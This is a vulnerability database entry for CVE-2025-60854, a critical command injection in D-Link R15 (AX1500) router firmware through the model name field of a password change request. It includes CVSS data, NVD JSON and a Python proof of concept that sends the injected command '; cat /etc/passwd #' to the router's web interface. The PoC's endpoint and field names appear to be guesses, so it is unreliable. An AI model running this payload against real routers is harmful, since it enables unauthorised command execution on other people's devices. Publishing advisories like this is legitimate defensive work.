Security Vulnerability Report
中文
CVE-2025-60854 CVSS 9.8 CRITICAL

CVE-2025-60854

Published: 2025-12-02 18:15:49
Last Modified: 2025-12-06 00:00:26

Description

A vulnerability has been found in D-Link R15 (AX1500) 1.20.01 and below. By manipulating the model name parameter during a password change request in the web administrator page, it is possible to trigger a command injection in httpd.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:r15_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:r15:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link R15 (AX1500) 固件 <= 1.20.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60854 D-Link R15 Command Injection PoC # Target: D-Link R15 (AX1500) firmware <= 1.20.01 target_ip = "192.168.0.1" # Router IP target_url = f"http://{target_ip}/cgi-bin/password_change.cgi" # Malicious payload with command injection # Injecting: cat /etc/passwd to verify command execution malicious_model = "; cat /etc/passwd #" data = { "model_name": malicious_model, "password": "admin123", "confirm_password": "admin123" } try: print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload: {malicious_model}") response = requests.post(target_url, data=data, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response:\n{response.text}") if response.status_code == 200: print("[+] Exploit sent successfully!") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60854", "sourceIdentifier": "[email protected]", "published": "2025-12-02T18:15:48.600", "lastModified": "2025-12-06T00:00:26.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in D-Link R15 (AX1500) 1.20.01 and below. By manipulating the model name parameter during a password change request in the web administrator page, it is possible to trigger a command injection in httpd."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:r15_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.20.01", "matchCriteriaId": "2A536AEC-E3A7-4085-B979-18D8B1A1A6BA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:r15:-:*:*:*:*:*:*:*", "matchCriteriaId": "714513B8-0676-46AF-82B2-4076F75BA17A"}]}]}], "references": [{"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10473", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}